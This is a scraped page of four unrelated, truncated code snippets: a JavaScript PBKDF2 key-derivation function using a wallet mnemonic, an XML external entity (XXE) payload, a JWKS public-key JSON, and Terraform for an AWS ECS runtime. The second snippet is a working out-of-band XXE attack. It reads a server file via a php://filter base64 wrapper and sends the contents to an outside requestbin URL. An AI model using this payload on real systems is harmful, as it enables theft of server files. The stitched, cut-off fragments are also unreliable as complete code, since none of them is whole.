This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function init(m, email, password) { | |
// generate the database encryption key | |
vendor.nCrypto | |
.pbkdf2( | |
Buffer.from(m.mnemonic, "utf8"), | |
Buffer.from(databaseKeySeed, "utf8"), | |
2048, | |
64, | |
"sha512" | |
) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/info.php"> | |
<!ENTITY % all "<!ENTITY send SYSTEM 'http://requestbin.fullcontact.com/1ef046f1?p=%file;'>"> | |
%all; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"keys": [ | |
{ | |
"kty": "EC", | |
"use": "sig", | |
"crv": "P-256", | |
"kid": "1", | |
"x": "L6VMeCZ1hB0DrnyIeMowYvjqtaI3BkiScYEoDjpWu3I", | |
"y": "jGWplIhxz8cC732WBiKMgA5Ydw3KwF4w1byEooSqS-E", | |
"alg": "ES256" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Restate runtime | |
resource "aws_cloudwatch_log_group" "restate_runtime" { | |
name = "/ecs/restate-runtime-task" | |
tags = { | |
Name = "restate-runtime-task" | |
} | |
} | |
resource "aws_ecs_cluster" "restate_runtime" { |